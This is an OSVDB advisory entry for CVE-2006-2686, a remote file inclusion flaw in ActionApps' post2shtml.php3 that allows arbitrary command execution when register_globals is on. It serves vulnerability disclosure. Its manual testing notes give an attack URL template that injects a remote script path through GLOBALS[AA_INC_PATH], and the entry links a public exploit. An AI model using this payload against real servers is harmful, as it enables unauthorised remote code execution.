ActionApps post2shtml.php3 GLOBALS[AA_INC_PATH] Remote File Inclusion

2006-05-25T10:34:21
ID OSVDB:27267
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-05-25T10:34:21

Description

Vulnerability Description

ActionApps contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the post2shtml.php3 script not properly sanitizing user input supplied to the 'GLOBALS[AA_INC_PATH]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

ActionApps contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the post2shtml.php3 script not properly sanitizing user input supplied to the 'GLOBALS[AA_INC_PATH]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

References:

Vendor URL: http://actionapps.org/en/Main_Page Secunia Advisory ID:20299 Related OSVDB ID: 27253 Related OSVDB ID: 27256 Related OSVDB ID: 27258 Related OSVDB ID: 27264 Related OSVDB ID: 27266 Related OSVDB ID: 27254 Related OSVDB ID: 27257 Related OSVDB ID: 27259 Related OSVDB ID: 27261 Related OSVDB ID: 27269 Related OSVDB ID: 27270 Related OSVDB ID: 27263 Related OSVDB ID: 27265 Related OSVDB ID: 27260 Related OSVDB ID: 27262 Related OSVDB ID: 27268 Related OSVDB ID: 27271 Related OSVDB ID: 27292 Generic Exploit URL: http://milw0rm.com/exploits/1829 FrSIRT Advisory: ADV-2006-1997 CVE-2006-2686